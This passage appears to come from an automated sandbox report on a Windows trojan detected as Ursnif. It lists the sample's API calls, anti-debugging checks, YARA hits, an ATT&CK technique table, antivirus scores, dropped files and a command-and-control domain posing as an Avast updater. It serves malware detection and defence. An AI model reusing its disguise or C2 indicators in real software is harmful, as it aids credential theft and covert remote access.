00000000.00000003.348413205.00000000015FE000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: plcd-player.exe, 00000011.00000002.528124057.00000000010CA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_6DA76FED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_6DA76FED

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_001A1264 LoadLibraryA,GetProcAddress,

17_2_001A1264

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_00202090 GetProcessHeap,RtlAllocateHeap,

17_2_00202090

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_6DA85BE9 mov eax, dword ptr fs:[00000030h]	17_2_6DA85BE9
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00355B18 mov eax, dword ptr fs:[00000030h]	17_2_00355B18
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00366DDC mov eax, dword ptr fs:[00000030h]	17_2_00366DDC
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_0039AC46 mov eax, dword ptr fs:[00000030h]	17_2_0039AC46

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_6DA76FED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_6DA76FED
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_6DA67D41 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_6DA67D41
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00347C2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00347C2C
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_00359C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00359C76

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI="
Source: C:\Users\user\Desktop\jXzrIReInY.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI="			Jump to behavior

Source: plcd-player.exe, 00000011.00000002.528977634.0000000001790000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: plcd-player.exe, 00000011.00000002.528977634.0000000001790000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: plcd-player.exe, 00000011.00000002.528977634.0000000001790000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: plcd-player.exe, 00000011.00000002.528977634.0000000001790000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\jXzrIReInY.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0036E1C8
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	17_2_0036E46A
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	17_2_0036E4B5
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	17_2_0036E550
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	17_2_0036655F
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0036E954
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetLocaleInfoW,	17_2_00366AC1
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0036EB29

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_02CE7A2E cpuid

17_2_02CE7A2E

Source: C:\Users\user\Desktop\jXzrIReInY.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_001A1E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

17_2_001A1E22

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_001A1752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

17_2_001A1752

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 17_2_02CE7A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

17_2_02CE7A2E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.2ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.35f94a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.plcd-player.exe.2ce0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001C10D0 WSAIoctl,bind,PostQueuedCompletionStatus,RtlEnterCriticalSection,RtlLeaveCriticalSection,WSAGetLastError,ioctlsocket,connect,		17_2_001C10D0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 17_2_001BF6D0 WSASocketW,setsockopt,bind,getsockname,listen,WSASocketW,connect,accept,ioctlsocket,setsockopt,ioctlsocket,setsockopt,		17_2_001BF6D0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Input Capture1	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Scheduled Task/Job1	Process Injection2	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Scheduled Task/Job1	Obfuscated Files or Information2	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Logon Script (Mac)	Software Packing23	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	System Information Discovery35	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Query Registry1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Security Software Discovery21	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading31	Proc Filesystem	Virtualization/Sandbox Evasion21	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion21	/etc/passwd and /etc/shadow	Process Discovery3	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection2	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
jXzrIReInY.exe	52%	Virustotal		Browse
jXzrIReInY.exe	23%	Metadefender		Browse
jXzrIReInY.exe	36%	ReversingLabs	Win32.Trojan.Chapak
jXzrIReInY.exe	100%	Avira	TR/Agent.llseq

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\lcms-5.0.dll	100%	Avira	TR/Redcap.chbhs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\plcd-player.exe	100%	Avira	TR/Agent.kkknq
C:\Users\user\AppData\Local\Temp\MSI1B4.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI1B4.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI4D2.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI4D2.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi1C.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\shi1C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
17.2.plcd-player.exe.2ce0000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
17.2.plcd-player.exe.1a0000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
windowsupdate.s.llnwi.net	0%	Virustotal		Browse
get.updates.avast.cn	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://get.updates.avast.cn/sreamble/g9_2FKpoNdUnXGannE6/i8VP6bKIH0KEVZxtH_2Fnm/ZbHMSZIAuG_2F/S_2FZ	0%	Avira URL Cloud	safe
http://crl.startssl.com/sfsca.crl0C	0%	Virustotal		Browse
http://crl.startssl.com/sfsca.crl0C	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://currencysystem.com/gfx/pub/script-icon-16x16.gif	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://www.ecb.int/vocabulary/2002-08-01/eurofxref	0%	Avira URL Cloud	safe
https://currencysystem.com/gfx/pub/script-button-88x31.gif	0%	Avira URL Cloud	safe
http://aia.startssl.com/certs/sub.class2.code.ca.crt0#	0%	Avira URL Cloud	safe
http://mybusinesscatalog.com0	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://www.startssl.com/policy.pdf0	0%	Avira URL Cloud	safe
https://currencysystem.com/gfx/pub/script-button-88x31.png	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	Avira URL Cloud	safe
http://ocsp.startssl.com/sub/class2/code/ca0	0%	Avira URL Cloud	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://get.updates.avast.cn/$$	0%	Avira URL Cloud	safe
http://www.gesmes.org/xml/2002-08-01	0%	Avira URL Cloud	safe
http://ocsp.startssl.com/ca00	0%	URL Reputation	safe
http://crl.startssl.com/crtc2-crl.crl0	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0)	0%	Avira URL Cloud	safe
http://www.MyBusinessCatalog.com	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://currencysystem.com/gfx/pub/script-icon-16x16.png	0%	Avira URL Cloud	safe
https://get.updates.avast.cn/SN	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://aia.startssl.com/certs/ca.crt02	0%	URL Reputation	safe
http://www.startssl.com/0	0%	Avira URL Cloud	safe
https://get.updates.avast.cn/	0%	Avira URL Cloud	safe
https://get.updates.avast.cn/rentVersion	0%	Avira URL Cloud	safe
https://currencysystem.com	0%	Avira URL Cloud	safe
https://get.u	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdate.s.llnwi.net	178.79.225.128	true	false	0%, Virustotal, Browse	unknown
get.updates.avast.cn	unknown	unknown	true	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.openssl.org/support/faq.html....................rbwb.rndC:HOMERANDFILEPRNG	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false		high
https://get.updates.avast.cn/sreamble/g9_2FKpoNdUnXGannE6/i8VP6bKIH0KEVZxtH_2Fnm/ZbHMSZIAuG_2F/S_2FZ	plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.startssl.com/sfsca.crl0C	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	jXzrIReInY.exe	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	jXzrIReInY.exe	false	URL Reputation: safe	unknown
http://www.openssl.org/V	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false		high
http://www.unicode.org/copyright.html	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false		high
https://currencysystem.com/gfx/pub/script-icon-16x16.gif	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	jXzrIReInY.exe	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	jXzrIReInY.exe	false	URL Reputation: safe	unknown
http://www.ecb.int/vocabulary/2002-08-01/eurofxref	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false		high
https://currencysystem.com/gfx/pub/script-button-88x31.gif	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.startssl.com/certs/sub.class2.code.ca.crt0#	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Secrets	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	false		high
http://mybusinesscatalog.com0	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0D	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://apache.org/xml/messages/XML4CErrors#FIXEDEBCDIC-CP-USIBM037IBM1047IBM-1047IBM1140IBM01140CCSI	jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	false		high
http://www.startssl.com/policy.pdf0	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://currencysystem.com/gfx/pub/script-button-88x31.png	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp, currencysystem5.json.0.dr	false	Avira URL Cloud: safe	unknown
http://apache.org/xml/messages/XMLValidityWINDOWS-1252XERCES-XMLCHhttp://apache.org/xml/messages/XML	jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	jXzrIReInY.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com/sub/class2/code/ca0	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	jXzrIReInY.exe, AWSSDK.SimpleDB.dll.4.dr	false	URL Reputation: safe	unknown
http://apache.org/xml/UnknownNSUCS4UCS-4UCS_4UTF-32ISO-10646-UCS-4UCS-4	jXzrIReInY.exe, 00000000.00000003.312512625.0000000005C19000.00000004.00000001.sdmp, plcd-player.exe, 00000011.00000002.527502141.000000000040A000.00000002.00020000.sdmp	false		high
https://get.updates.avast.cn/$$	plcd-player.exe, 00000011.00000002.529180964.0000000002BC2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Keys	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	false		high
http://www.gesmes.org/xml/2002-08-01	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com/ca00	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	URL Reputation: safe	unknown
https://aka.ms/azsdkvalueprop.	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	false		high
http://crl.startssl.com/crtc2-crl.crl0	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0)	jXzrIReInY.exe	false	Avira URL Cloud: safe	low
http://icu-project.org	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false		high
http://www.MyBusinessCatalog.com	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.nuget.org/packages/Azure.Security.KeyVault.Certificates	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, Microsoft.Azure.KeyVault.Core.dll.4.dr	false		high
https://currencysystem.com/gfx/pub/script-icon-16x16.png	jXzrIReInY.exe, 00000000.00000003.311251809.00000000058F0000.00000004.00000001.sdmp, currencysystem5.json.0.dr	false	Avira URL Cloud: safe	unknown
https://get.updates.avast.cn/SN	plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/cps0/	jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.thawte.com/repository0W	jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	false		high
http://aia.startssl.com/certs/ca.crt02	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	URL Reputation: safe	unknown
https://www.advancedinstaller.com	jXzrIReInY.exe, 00000000.00000003.262934774.0000000003DD3000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.262536222.0000000003C70000.00000004.00000001.sdmp, MSIA23E.tmp.4.dr, MSI4D2.tmp.0.dr, MSIA463.tmp.4.dr	false		high
https://secure.comodo.com/CPS0L	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, jXzrIReInY.exe, 00000000.00000003.312652957.0000000005CE6000.00000004.00000001.sdmp, AWSSDK.SimpleDB.dll.4.dr	false		high
http://www.startssl.com/0	jXzrIReInY.exe, 00000000.00000003.312819494.0000000005E6E000.00000004.00000001.sdmp, ssleay32.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://get.updates.avast.cn/	plcd-player.exe, 00000011.00000002.529360023.0000000002C6A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://get.updates.avast.cn/rentVersion	plcd-player.exe, 00000011.00000002.529180964.0000000002BC2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://currencysystem.com	currencysystem5.json.0.dr	false	Avira URL Cloud: safe	unknown
https://get.u	plcd-player.exe, 00000011.00000002.530727824.00000000031EB000.00000004.00000010.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528552
Start date:	25.11.2021
Start time:	13:49:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	jXzrIReInY (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/70@1/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.9% (good quality ratio 4.8%) Quality average: 73.1% Quality standard deviation: 26.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
